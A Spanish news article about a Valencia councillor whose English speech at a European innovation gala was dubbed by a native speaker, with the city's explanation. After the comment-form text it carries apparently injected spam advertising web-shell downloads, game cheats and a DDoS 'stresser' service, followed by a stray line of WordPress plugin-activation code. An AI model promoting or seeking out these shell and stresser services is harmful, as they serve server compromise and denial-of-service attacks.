Un concejal de Valencia simula hablar inglés mientras es doblado por un nativo


El concejal de Innovación del Ayuntamiento de Valencia, Carlos Galiana, ha intervenido esta mañana en inglés en la gala que ha determinado qué ciudad iba a ser Capital Europa de la Innovación. Valencia optaba a este reconocimiento que finalmente ha recaído en Lovaina, en Bélgica. Nada raro si no fuera porque el edil ha hecho su intervención con un ‘playback’ en inglés.

El concejal (y actor) ha aparecido con mascarilla (el único de las ciudades intervinientes) y su discurso en inglés ha sido doblado por un traductor. En su intervención, el edil ha defendido los pasos que la ciudad está tomando «hacia una Valencia más sostenible». Se da la circunstancia, además, que el concejal sí habla inglés.

Preguntado por esta cuestión, el concejal Galiana contestó desde el pleno: «Yes, I speak English» («sí, hablo inglés»). Fuentes municipales, por su parte, han explicado que las reglas de la Comisión Europea indicaban que tenía que hablar sí o sí el alcalde. Como excepción se ha permitido la participación de Galiana, pero tiene un «nivel básico de inglés». Por eso, se ha preferido, según las mismas fuentes, que ante el riesgo de que no se le entendiera «por el acento» y el mensaje no llegara, se grabara un mensaje en inglés desde Las Naves.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );